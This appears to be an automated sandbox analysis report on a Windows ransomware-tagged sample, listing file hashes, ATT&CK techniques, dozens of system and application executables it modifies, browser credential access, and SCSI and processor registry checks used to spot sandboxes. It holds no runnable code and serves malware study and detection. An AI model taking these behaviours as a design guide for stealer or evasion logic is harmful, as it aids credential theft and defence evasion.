77a7216e9d954df5898451cb6f61a150cca9e6fec76004a191a2fddc195d5dec

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10/08/2024, 02:39 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Size

712KB
MD5

f6847ab67e21a9dd8b96a09b80daa65c
SHA1

e33fb83ab7c248491dd27b8462276b9f75443aa6
SHA256

77a7216e9d954df5898451cb6f61a150cca9e6fec76004a191a2fddc195d5dec
SHA512

ea99e7276be1302ab1ef50be21d5857d54722273492662961cb2cb9a1d4d332a766984f95f7ffed99ae70efc5bf68fe251d9d9d55be144a1b6bced8161d39747
SSDEEP

12288:/tOw6BaWMTmkJR4Do07Y86gw5CtCjX+NLuFhNpBeZT3X:16B8SkQ/7Gb8NLEbeZ

Score

7^/10

discovery spyware stealer

Malware Config

Signatures

Executes dropped EXE 22 IoCs

pid	Process
3220	alg.exe
1996	DiagnosticsHub.StandardCollector.Service.exe
3292	fxssvc.exe
2596	elevation_service.exe
2548	elevation_service.exe
2472	maintenanceservice.exe
2236	msdtc.exe
3144	OSE.EXE
2180	PerceptionSimulationService.exe
4904	perfhost.exe
1800	locator.exe
2672	SensorDataService.exe
2948	snmptrap.exe
4744	spectrum.exe
4688	ssh-agent.exe
2800	TieringEngineService.exe
1032	AgentService.exe
4468	vds.exe
4516	vssvc.exe
3536	wbengine.exe
5040	WmiApSrv.exe
3100	SearchIndexer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\vssvc.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\SearchIndexer.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\AgentService.exe	alg.exe
File opened for modification	C:\Windows\System32\alg.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	alg.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\msiexec.exe	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\locator.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\System32\OpenSSH\ssh-agent.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\TieringEngineService.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\System32\msdtc.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\SysWow64\perfhost.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\System32\snmptrap.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\System32\vds.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\8312ebef240c1bce.bin	alg.exe
File opened for modification	C:\Windows\system32\msiexec.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\spectrum.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\AgentService.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\wbengine.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	alg.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	alg.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	alg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdb.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javah.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmid.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files\dotnet\dotnet.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javac.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\servertool.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\dotnet\dotnet.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	alg.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpnetwk.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	perfhost.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

